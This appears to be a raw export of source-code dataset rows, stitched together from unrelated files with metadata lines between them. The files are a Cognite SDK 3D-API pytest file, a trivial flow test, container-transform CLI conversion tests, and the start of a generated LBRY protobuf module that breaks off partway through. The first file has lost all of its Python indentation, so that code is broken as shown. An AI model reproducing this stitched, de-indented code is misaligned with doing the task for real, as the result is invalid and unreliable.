assert {"id": 1, "update": {"name": {"set": "bla"}}} == jsgz_load(mock_3d_model_response.calls[0].request.body)[
"items"
][0]
assert mock_3d_model_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)
def test_delete(self, cognite_client, mock_3d_model_response):
res = cognite_client.three_d.models.delete(id=1)
assert {"items": [{"id": 1}]} == jsgz_load(mock_3d_model_response.calls[0].request.body)
assert res is None
res = cognite_client.three_d.models.delete(id=[1])
assert {"items": [{"id": 1}]} == jsgz_load(mock_3d_model_response.calls[1].request.body)
assert res is None
def test_retrieve(self, cognite_client, mock_retrieve_3d_model_response):
res = cognite_client.three_d.models.retrieve(id=1)
assert isinstance(res, ThreeDModel)
assert mock_retrieve_3d_model_response.calls[0].response.json() == res.dump(camel_case=True)
def test_create(self, cognite_client, mock_3d_model_response):
res = cognite_client.three_d.models.create(name="My Model")
assert isinstance(res, ThreeDModel)
assert jsgz_load(mock_3d_model_response.calls[0].request.body) == {"items": [{"name": "My Model"}]}
assert mock_3d_model_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)
def test_create_multiple(self, cognite_client, mock_3d_model_response):
res = cognite_client.three_d.models.create(name=["My Model"])
assert isinstance(res, ThreeDModelList)
assert jsgz_load(mock_3d_model_response.calls[0].request.body) == {"items": [{"name": "My Model"}]}
assert mock_3d_model_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
@pytest.fixture
def mock_3d_model_revision_response(rsps, cognite_client):
response_body = {
"items": [
{
"id": 1,
"fileId": 1000,
"published": False,
"rotation": [0, 0, 0],
"camera": {"target": [0, 0, 0], "position": [0, 0, 0]},
"status": "Done",
"thumbnailThreedFileId": 1000,
"thumbnailUrl": "https://api.cognitedata.com/api/v1/project/myproject/3d/files/1000",
"assetMappingCount": 0,
"createdTime": 0,
}
]
}
url_pattern = re.compile(
re.escape(cognite_client.three_d._get_base_url_with_base_path()) + "/3d/models/1/revisions.*"
)
rsps.add(rsps.POST, url_pattern, status=200, json=response_body)
rsps.add(rsps.GET, url_pattern, status=200, json=response_body)
rsps.assert_all_requests_are_fired = False
yield rsps
@pytest.fixture
def mock_retrieve_3d_model_revision_response(rsps, cognite_client):
res = {
"id": 1000,
"fileId": 1000,
"published": False,
"rotation": [0, 0, 0],
"camera": {"target": [0, 0, 0], "position": [0, 0, 0]},
"status": "Done",
"thumbnailThreedFileId": 1000,
"thumbnailUrl": "https://api.cognitedata.com/api/v1/project/myproject/3d/files/1000",
"assetMappingCount": 0,
"createdTime": 0,
}
rsps.add(
rsps.GET,
cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1",
status=200,
json=res,
)
yield rsps
@pytest.fixture
def mock_3d_model_revision_thumbnail_response(rsps, cognite_client):
rsps.add(
rsps.POST,
cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/thumbnail",
status=200,
json={},
)
yield rsps
@pytest.fixture
def mock_3d_model_revision_node_response(rsps, cognite_client):
response_body = {
"items": [
{
"id": 1,
"treeIndex": 3,
"parentId": 2,
"depth": 2,
"name": "Node name",
"subtreeSize": 4,
"boundingBox": {"max": [0, 0, 0], "min": [0, 0, 0]},
}
]
}
rsps.add(
rsps.GET,
cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/nodes",
status=200,
json=response_body,
)
rsps.add(
rsps.POST,
cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/nodes/list",
status=200,
json=response_body,
)
rsps.add(
rsps.GET,
cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/nodes/ancestors",
status=200,
json=response_body,
)
rsps.assert_all_requests_are_fired = False
yield rsps
class Test3DModelRevisions:
def test_list(self, cognite_client, mock_3d_model_revision_response):
res = cognite_client.three_d.revisions.list(model_id=1, published=True, limit=100)
assert isinstance(res, ThreeDModelRevisionList)
assert mock_3d_model_revision_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
def test_update_with_update_object(self, cognite_client, mock_3d_model_revision_response):
update = ThreeDModelRevisionUpdate(id=1).published.set(False)
cognite_client.three_d.revisions.update(1, update)
assert {"id": 1, "update": {"published": {"set": False}}} == jsgz_load(
mock_3d_model_revision_response.calls[0].request.body
)["items"][0]
def test_update_with_resource_object(self, cognite_client, mock_3d_model_revision_response):
cognite_client.three_d.revisions.update(1, ThreeDModelRevision(id=1, published=False, created_time=123))
assert {"id": 1, "update": {"published": {"set": False}}} == jsgz_load(
mock_3d_model_revision_response.calls[0].request.body
)["items"][0]
def test_delete(self, cognite_client, mock_3d_model_revision_response):
res = cognite_client.three_d.revisions.delete(1, id=1)
assert {"items": [{"id": 1}]} == jsgz_load(mock_3d_model_revision_response.calls[0].request.body)
assert res is None
res = cognite_client.three_d.revisions.delete(1, id=[1])
assert {"items": [{"id": 1}]} == jsgz_load(mock_3d_model_revision_response.calls[1].request.body)
assert res is None
def test_retrieve(self, cognite_client, mock_retrieve_3d_model_revision_response):
res = cognite_client.three_d.revisions.retrieve(model_id=1, id=1)
assert isinstance(res, ThreeDModelRevision)
assert mock_retrieve_3d_model_revision_response.calls[0].response.json() == res.dump(camel_case=True)
def test_create(self, cognite_client, mock_3d_model_revision_response):
res = cognite_client.three_d.revisions.create(model_id=1, revision=ThreeDModelRevision(file_id=123))
assert isinstance(res, ThreeDModelRevision)
assert {"items": [{"fileId": 123}]} == jsgz_load(mock_3d_model_revision_response.calls[0].request.body)
assert mock_3d_model_revision_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)
def test_create_multiple(self, cognite_client, mock_3d_model_revision_response):
res = cognite_client.three_d.revisions.create(model_id=1, revision=[ThreeDModelRevision(file_id=123)])
assert isinstance(res, ThreeDModelRevisionList)
assert {"items": [{"fileId": 123}]} == jsgz_load(mock_3d_model_revision_response.calls[0].request.body)
assert mock_3d_model_revision_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
def test_update_thumbnail(self, cognite_client, mock_3d_model_revision_thumbnail_response):
res = cognite_client.three_d.revisions.update_thumbnail(model_id=1, revision_id=1, file_id=1)
assert {"fileId": 1} == jsgz_load(mock_3d_model_revision_thumbnail_response.calls[0].request.body)
assert res is None
def test_list_3d_nodes(self, cognite_client, mock_3d_model_revision_node_response):
res = cognite_client.three_d.revisions.list_nodes(model_id=1, revision_id=1, node_id=None, depth=None, limit=10)
assert isinstance(res, ThreeDNodeList)
assert mock_3d_model_revision_node_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
def test_filter_3d_nodes(self, cognite_client, mock_3d_model_revision_node_response):
res = cognite_client.three_d.revisions.filter_nodes(
model_id=1, revision_id=1, properties={"Item": {"Type": ["Group"]}}, limit=10
)
assert isinstance(res, ThreeDNodeList)
assert mock_3d_model_revision_node_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
def test_list_3d_ancestor_nodes(self, cognite_client, mock_3d_model_revision_node_response):
res = cognite_client.three_d.revisions.list_ancestor_nodes(model_id=1, revision_id=1, node_id=None, limit=10)
assert isinstance(res, ThreeDNodeList)
assert mock_3d_model_revision_node_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
class Test3DFiles:
@pytest.fixture
def mock_3d_files_response(self, cognite_client, rsps):
rsps.add(rsps.GET, cognite_client.three_d._get_base_url_with_base_path() + "/3d/files/1", body="bla")
def test_retrieve(self, cognite_client, mock_3d_files_response):
assert b"bla" == cognite_client.three_d.files.retrieve(1)
class Test3DAssetMappings:
@pytest.fixture
def mock_3d_asset_mappings_response(self, cognite_client, rsps):
response_body = {"items": [{"nodeId": 1003, "assetId": 3001, "treeIndex": 5, "subtreeSize": 7}]}
url_pattern = re.compile(
re.escape(cognite_client.three_d._get_base_url_with_base_path()) + "/3d/models/1/revisions/1/mappings.*"
)
rsps.add(rsps.GET, url_pattern, status=200, json=response_body)
rsps.add(rsps.POST, url_pattern, status=200, json=response_body)
rsps.assert_all_requests_are_fired = False
yield rsps
def test_list(self, cognite_client, mock_3d_asset_mappings_response):
res = cognite_client.three_d.asset_mappings.list(
model_id=1, revision_id=1, node_id=None, asset_id=None, limit=None
)
assert isinstance(res, ThreeDAssetMappingList)
assert mock_3d_asset_mappings_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
def test_create(self, cognite_client, mock_3d_asset_mappings_response):
res = cognite_client.three_d.asset_mappings.create(
model_id=1, revision_id=1, asset_mapping=ThreeDAssetMapping(node_id=1, asset_id=1)
)
assert isinstance(res, ThreeDAssetMapping)
assert mock_3d_asset_mappings_response.calls[0].response.json()["items"][0] == res.dump(camel_case=True)
def test_create_multiple(self, cognite_client, mock_3d_asset_mappings_response):
res = cognite_client.three_d.asset_mappings.create(
model_id=1, revision_id=1, asset_mapping=[ThreeDAssetMapping(node_id=1, asset_id=1)]
)
assert isinstance(res, ThreeDAssetMappingList)
assert mock_3d_asset_mappings_response.calls[0].response.json()["items"] == res.dump(camel_case=True)
def test_delete(self, cognite_client, mock_3d_asset_mappings_response):
res = cognite_client.three_d.asset_mappings.delete(
model_id=1, revision_id=1, asset_mapping=ThreeDAssetMapping(1, 1)
)
assert res is None
assert [{"nodeId": 1, "assetId": 1}] == jsgz_load(mock_3d_asset_mappings_response.calls[0].request.body)[
"items"
]
def test_delete_multiple(self, cognite_client, mock_3d_asset_mappings_response):
res = cognite_client.three_d.asset_mappings.delete(
model_id=1, revision_id=1, asset_mapping=[ThreeDAssetMapping(1, 1)]
)
assert res is None
assert [{"nodeId": 1, "assetId": 1}] == jsgz_load(mock_3d_asset_mappings_response.calls[0].request.body)[
"items"
]
def test_delete_fails(self, cognite_client, rsps):
rsps.add(
rsps.POST,
cognite_client.three_d._get_base_url_with_base_path() + "/3d/models/1/revisions/1/mappings/delete",
status=500,
json={"error": {"message": "Server Error", "code": 500}},
)
with pytest.raises(CogniteAPIError) as e:
cognite_client.three_d.asset_mappings.delete(
model_id=1, revision_id=1, asset_mapping=[ThreeDAssetMapping(1, 1)]
)
assert e.value.unknown == [ThreeDAssetMapping._load({"assetId": 1, "nodeId": 1})]
| 45.9 | 120 | 0.681785 | 1,986 | 15,147 | 4.890232 | 0.079557 | 0.100391 | 0.053233 | 0.076297 | 0.880251 | 0.847096 | 0.837212 | 0.781404 | 0.768431 | 0.727965 | 0 | 0.030189 | 0.193042 | 15,147 | 329 | 121 | 46.039514 | 0.764379 | 0 | 0 | 0.468085 | 0 | 0.007092 | 0.080346 | 0.02007 | 0 | 0 | 0 | 0 | 0.216312 | 1 | 0.120567 | false | 0 | 0.017731 | 0 | 0.152482 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
124d0e00e9c8392947878d48f3822a6422db9898 | 70 | py | Python | tests/calculator/flow_test.py | goncalovalverde/seshat | deff5cdd985f81ac2b4ebd077eea11f7c4f4118f | [
"MIT"
] | 1 | 2020-12-22T13:23:00.000Z | 2020-12-22T13:23:00.000Z | tests/calculator/flow_test.py | goncalovalverde/seshat | deff5cdd985f81ac2b4ebd077eea11f7c4f4118f | [
"MIT"
] | 5 | 2020-12-22T13:36:30.000Z | 2021-02-27T05:42:18.000Z | tests/calculator/flow_test.py | goncalovalverde/seshat | deff5cdd985f81ac2b4ebd077eea11f7c4f4118f | [
"MIT"
] | null | null | null | import calculator.flow
def test_cycle_data():
assert 1 + 1 == 2
| 11.666667 | 22 | 0.671429 | 11 | 70 | 4.090909 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.228571 | 70 | 5 | 23 | 14 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
89efb107bef859875443565658f4430dff6d3562 | 11,423 | py | Python | container_transform/tests/client_tests.py | psykzz/container-transform | 68223fae98f30b8bb2ce0f02ba9e58afbc80f196 | [
"MIT"
] | 1,141 | 2016-02-05T22:29:48.000Z | 2022-03-31T20:42:46.000Z | container_transform/tests/client_tests.py | psykzz/container-transform | 68223fae98f30b8bb2ce0f02ba9e58afbc80f196 | [
"MIT"
] | 62 | 2016-02-07T17:28:15.000Z | 2021-09-06T12:38:53.000Z | container_transform/tests/client_tests.py | psykzz/container-transform | 68223fae98f30b8bb2ce0f02ba9e58afbc80f196 | [
"MIT"
] | 138 | 2016-03-03T06:35:54.000Z | 2022-03-30T17:47:34.000Z | import os
import json
from unittest import TestCase
from click.testing import CliRunner
from container_transform.client import transform
class ClientTests(TestCase):
"""
Tests for client
"""
def setUp(self):
self.yaml_input = (
'\n'
'web:\n'
' image: me/myapp\n'
' mem_limit: 1024b\n'
'\n'
'web2:\n'
' build: .\n'
' mem_limit: 1024b\n'
)
def test_prompt_compose_quiet(self):
runner = CliRunner()
with runner.isolated_filesystem():
with open('docker-compose.yml', 'w') as f:
f.write(self.yaml_input)
result = runner.invoke(transform, ['docker-compose.yml', '-q'])
assert result.exit_code == 0
data = json.loads(result.output)
self.assertIn(
{
'name': 'web',
'image': 'me/myapp',
'memory': 4,
'essential': True
},
data['containerDefinitions'],
)
self.assertIn(
{
'name': 'web2',
'memory': 4,
'essential': True
},
data['containerDefinitions'],
)
def test_prompt_fig_quiet(self):
runner = CliRunner()
with runner.isolated_filesystem():
with open('fig.yml', 'w') as f:
f.write(self.yaml_input)
result = runner.invoke(transform, ['fig.yml', '-q'])
assert result.exit_code == 0
data = json.loads(result.output)
self.assertIn(
{
'name': 'web',
'image': 'me/myapp',
'memory': 4,
'essential': True
},
data['containerDefinitions'],
)
self.assertIn(
{
'name': 'web2',
'memory': 4,
'essential': True
},
data['containerDefinitions'],
)
def test_prompt_fig_no_quiet(self):
runner = CliRunner()
with runner.isolated_filesystem():
with open('fig.yml', 'w') as f:
f.write(self.yaml_input)
result = runner.invoke(transform, ['fig.yml', '--no-verbose'])
assert result.exit_code == 0
data = json.loads(result.output.split('\n')[0])
messages = set(result.output.split('\n')[1:])
self.assertEqual(
{'Container web2 is missing required parameter "image".',
''},
messages
)
self.assertIn(
{
'name': 'web',
'image': 'me/myapp',
'memory': 4,
'essential': True
},
data['containerDefinitions'],
)
self.assertIn(
{
'name': 'web2',
'memory': 4,
'essential': True
},
data['containerDefinitions'],
)
def test_prompt_compose_systemd_quiet(self):
runner = CliRunner()
input_file = '{}/docker-compose-web.yml'.format(os.path.dirname(__file__))
result = runner.invoke(transform, [input_file, '-q', '--output-type', 'systemd'])
assert result.exit_code == 0
service_file = '{}/web.service'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_marathon_compose_quiet(self):
runner = CliRunner()
input_file = '{}/marathon-test.json'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '--input-type', 'marathon', '--output-type', 'compose'])
assert result.exit_code == 0
service_file = '{}/marathon-test-out.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_marathon_compose_group_quiet(self):
runner = CliRunner()
input_file = '{}/marathon-group.json'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '--input-type', 'marathon', '--output-type', 'compose'])
assert result.exit_code == 0
service_file = '{}/marathon-group-out.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_marathon_compose_list_quiet(self):
runner = CliRunner()
input_file = '{}/marathon-list.json'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '--input-type', 'marathon', '--output-type', 'compose'])
assert result.exit_code == 0
service_file = '{}/marathon-list-out.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_compose_marathon_quiet(self):
runner = CliRunner()
input_file = '{}/marathon-test.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '--input-type', 'compose', '--output-type', 'marathon'])
assert result.exit_code == 0
service_file = '{}/marathon-compose-out.json'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_compose_marathon_quiet_mini(self):
runner = CliRunner()
input_file = '{}/marathon-test.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[
input_file, '-q', '--input-type', 'compose',
'--output-type', 'marathon', '--no-verbose'])
assert result.exit_code == 0
def test_prompt_compose_marathon_single_app_quiet(self):
runner = CliRunner()
input_file = '{}/composev2.yml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[
input_file, '-q', '--input-type', 'compose',
'--output-type', 'marathon', '--no-verbose'])
assert result.exit_code == 0
result_data = json.loads(result.output)
self.assertIsInstance(result_data, dict)
def test_prompt_compose_to_chronos_quiet(self):
runner = CliRunner()
input_file = '{}/marathon-test.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[
input_file, '-q', '--input-type', 'compose',
'--output-type', 'chronos', '--no-verbose'])
assert result.exit_code == 0
result_data = json.loads(result.output)
self.assertIsInstance(result_data, list)
def test_prompt_compose_to_chronos_single_verbose_quiet(self):
runner = CliRunner()
input_file = '{}/composev2.0.yml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-v', '-i', 'compose', '-o', 'chronos'])
assert result.exit_code == 0
result_data = json.loads(result.output)
self.assertIsInstance(result_data, dict)
def test_prompt_chronos_to_compose_list_quiet(self):
runner = CliRunner()
input_file = '{}/fixtures/chronos-list.json'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '--input-type', 'chronos', '--output-type', 'compose'])
assert result.exit_code == 0
service_file = '{}/fixtures/chronos-list-out.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_chronos_to_compose_single_quiet(self):
runner = CliRunner()
input_file = '{}/fixtures/chronos-single.json'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '--input-type', 'chronos', '--output-type', 'compose'])
assert result.exit_code == 0
service_file = '{}/fixtures/chronos-single-out.yml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_k8s_to_compose_single_quiet(self):
runner = CliRunner()
input_file = '{}/k8s_tests/alpine.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-i', 'kubernetes', '-o', 'compose'])
assert result.exit_code == 0
service_file = '{}/k8s_tests/alpine-out.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_compose_to_k8s_single_quiet(self):
runner = CliRunner()
input_file = '{}/k8s_tests/alpine-out.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-i', 'compose', '-o', 'kubernetes'])
assert result.exit_code == 0
service_file = '{}/k8s_tests/alpine-out-again.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_k8s_to_compose_multiple_quiet(self):
runner = CliRunner()
input_file = '{}/k8s_tests/dns.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-i', 'kubernetes', '-o', 'compose'])
assert result.exit_code == 0
service_file = '{}/k8s_tests/dns-compose.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
def test_prompt_compose_to_k8s_multiple_quiet(self):
self.maxDiff = None
runner = CliRunner()
input_file = '{}/k8s_tests/dns-compose.yaml'.format(os.path.dirname(__file__))
result = runner.invoke(
transform,
[input_file, '-q', '-i', 'compose', '-o', 'kubernetes'])
assert result.exit_code == 0
service_file = '{}/k8s_tests/dns-k8s-out.yaml'.format(os.path.dirname(__file__))
service_contents = open(service_file).read()
self.assertEqual(
result.output,
service_contents
)
| 32.359773 | 93 | 0.543815 | 1,140 | 11,423 | 5.176316 | 0.094737 | 0.045755 | 0.052872 | 0.083715 | 0.90544 | 0.894425 | 0.877309 | 0.843925 | 0.803762 | 0.795628 | 0 | 0.007123 | 0.324083 | 11,423 | 352 | 94 | 32.451705 | 0.757156 | 0.001401 | 0 | 0.635714 | 0 | 0 | 0.151172 | 0.053112 | 0 | 0 | 0 | 0 | 0.139286 | 1 | 0.067857 | false | 0 | 0.017857 | 0 | 0.089286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d63f73964e9510ca6ff99fd26bc7651bee1179d6 | 167,132 | py | Python | lbry/schema/types/v2/claim_pb2.py | nishp77/lbry-sdk | 7531401623a393a1491e3b65de0e2a65f8e45020 | [
"MIT"
] | 4,996 | 2019-06-21T04:44:34.000Z | 2022-03-31T14:24:52.000Z | lbry/schema/types/v2/claim_pb2.py | nishp77/lbry-sdk | 7531401623a393a1491e3b65de0e2a65f8e45020 | [
"MIT"
] | 1,934 | 2015-11-25T20:40:45.000Z | 2019-06-21T00:50:03.000Z | lbry/schema/types/v2/claim_pb2.py | nishp77/lbry-sdk | 7531401623a393a1491e3b65de0e2a65f8e45020 | [
"MIT"
] | 369 | 2015-12-05T21:18:07.000Z | 2019-06-10T12:40:50.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: claim.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='claim.proto',
package='pb',
syntax='proto3',
serialized_pb=_b('\n\x0b\x63laim.proto\x12\x02pb\"\xab\x02\n\x05\x43laim\x12\x1c\n\x06stream\x18\x01 \x01(\x0b\x32\n.pb.StreamH\x00\x12\x1e\n\x07\x63hannel\x18\x02 \x01(\x0b\x32\x0b.pb.ChannelH\x00\x12#\n\ncollection\x18\x03 \x01(\x0b\x32\r.pb.ClaimListH\x00\x12$\n\x06repost\x18\x04 \x01(\x0b\x32\x12.pb.ClaimReferenceH\x00\x12\r\n\x05title\x18\x08 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\t \x01(\t\x12\x1d\n\tthumbnail\x18\n \x01(\x0b\x32\n.pb.Source\x12\x0c\n\x04tags\x18\x0b \x03(\t\x12\x1f\n\tlanguages\x18\x0c \x03(\x0b\x32\x0c.pb.Language\x12\x1f\n\tlocations\x18\r \x03(\x0b\x32\x0c.pb.LocationB\x06\n\x04type\"\x84\x02\n\x06Stream\x12\x1a\n\x06source\x18\x01 \x01(\x0b\x32\n.pb.Source\x12\x0e\n\x06\x61uthor\x18\x02 \x01(\t\x12\x0f\n\x07license\x18\x03 \x01(\t\x12\x13\n\x0blicense_url\x18\x04 \x01(\t\x12\x14\n\x0crelease_time\x18\x05 \x01(\x03\x12\x14\n\x03\x66\x65\x65\x18\x06 \x01(\x0b\x32\x07.pb.Fee\x12\x1a\n\x05image\x18\n \x01(\x0b\x32\t.pb.ImageH\x00\x12\x1a\n\x05video\x18\x0b \x01(\x0b\x32\t.pb.VideoH\x00\x12\x1a\n\x05\x61udio\x18\x0c \x01(\x0b\x32\t.pb.AudioH\x00\x12 \n\x08software\x18\r \x01(\x0b\x32\x0c.pb.SoftwareH\x00\x42\x06\n\x04type\"}\n\x07\x43hannel\x12\x12\n\npublic_key\x18\x01 \x01(\x0c\x12\r\n\x05\x65mail\x18\x02 \x01(\t\x12\x13\n\x0bwebsite_url\x18\x03 \x01(\t\x12\x19\n\x05\x63over\x18\x04 \x01(\x0b\x32\n.pb.Source\x12\x1f\n\x08\x66\x65\x61tured\x18\x05 \x01(\x0b\x32\r.pb.ClaimList\"$\n\x0e\x43laimReference\x12\x12\n\nclaim_hash\x18\x01 \x01(\x0c\"\x90\x01\n\tClaimList\x12)\n\tlist_type\x18\x01 \x01(\x0e\x32\x16.pb.ClaimList.ListType\x12,\n\x10\x63laim_references\x18\x02 \x03(\x0b\x32\x12.pb.ClaimReference\"*\n\x08ListType\x12\x0e\n\nCOLLECTION\x10\x00\x12\x0e\n\nDERIVATION\x10\x02\"y\n\x06Source\x12\x0c\n\x04hash\x18\x01 \x01(\x0c\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0c\n\x04size\x18\x03 \x01(\x04\x12\x12\n\nmedia_type\x18\x04 \x01(\t\x12\x0b\n\x03url\x18\x05 \x01(\t\x12\x0f\n\x07sd_hash\x18\x06 \x01(\x0c\x12\x13\n\x0b\x62t_infohash\x18\x07 \x01(\x0c\"\x87\x01\n\x03\x46\x65\x65\x12\"\n\x08\x63urrency\x18\x01 \x01(\x0e\x32\x10.pb.Fee.Currency\x12\x0f\n\x07\x61\x64\x64ress\x18\x02 \x01(\x0c\x12\x0e\n\x06\x61mount\x18\x03 \x01(\x04\";\n\x08\x43urrency\x12\x14\n\x10UNKNOWN_CURRENCY\x10\x00\x12\x07\n\x03LBC\x10\x01\x12\x07\n\x03\x42TC\x10\x02\x12\x07\n\x03USD\x10\x03\"&\n\x05Image\x12\r\n\x05width\x18\x01 \x01(\r\x12\x0e\n\x06height\x18\x02 \x01(\r\"R\n\x05Video\x12\r\n\x05width\x18\x01 \x01(\r\x12\x0e\n\x06height\x18\x02 \x01(\r\x12\x10\n\x08\x64uration\x18\x03 \x01(\r\x12\x18\n\x05\x61udio\x18\x0f \x01(\x0b\x32\t.pb.Audio\"\x19\n\x05\x41udio\x12\x10\n\x08\x64uration\x18\x01 \x01(\r\"l\n\x08Software\x12\n\n\x02os\x18\x01 \x01(\t\"T\n\x02OS\x12\x0e\n\nUNKNOWN_OS\x10\x00\x12\x07\n\x03\x41NY\x10\x01\x12\t\n\x05LINUX\x10\x02\x12\x0b\n\x07WINDOWS\x10\x03\x12\x07\n\x03MAC\x10\x04\x12\x0b\n\x07\x41NDROID\x10\x05\x12\x07\n\x03IOS\x10\x06\"\xc7\x1d\n\x08Language\x12\'\n\x08language\x18\x01 \x01(\x0e\x32\x15.pb.Language.Language\x12#\n\x06script\x18\x02 \x01(\x0e\x32\x13.pb.Language.Script\x12$\n\x06region\x18\x03 \x01(\x0e\x32\x14.pb.Location.Country\"\x99\x0c\n\x08Language\x12\x14\n\x10UNKNOWN_LANGUAGE\x10\x00\x12\x06\n\x02\x65n\x10\x01\x12\x06\n\x02\x61\x61\x10\x02\x12\x06\n\x02\x61\x62\x10\x03\x12\x06\n\x02\x61\x65\x10\x04\x12\x06\n\x02\x61\x66\x10\x05\x12\x06\n\x02\x61k\x10\x06\x12\x06\n\x02\x61m\x10\x07\x12\x06\n\x02\x61n\x10\x08\x12\x06\n\x02\x61r\x10\t\x12\x06\n\x02\x61s\x10\n\x12\x06\n\x02\x61v\x10\x0b\x12\x06\n\x02\x61y\x10\x0c\x12\x06\n\x02\x61z\x10\r\x12\x06\n\x02\x62\x61\x10\x0e\x12\x06\n\x02\x62\x65\x10\x0f\x12\x06\n\x02\x62g\x10\x10\x12\x06\n\x02\x62h\x10\x11\x12\x06\n\x02\x62i\x10\x12\x12\x06\n\x02\x62m\x10\x13\x12\x06\n\x02\x62n\x10\x14\x12\x06\n\x02\x62o\x10\x15\x12\x06\n\x02\x62r\x10\x16\x12\x06\n\x02\x62s\x10\x17\x12\x06\n\x02\x63\x61\x10\x18\x12\x06\n\x02\x63\x65\x10\x19\x12\x06\n\x02\x63h\x10\x1a\x12\x06\n\x02\x63o\x10\x1b\x12\x06\n\x02\x63r\x10\x1c\x12\x06\n\x02\x63s\x10\x1d\x12\x06\n\x02\x63u\x10\x1e\x12\x06\n\x02\x63v\x10\x1f\x12\x06\n\x02\x63y\x10 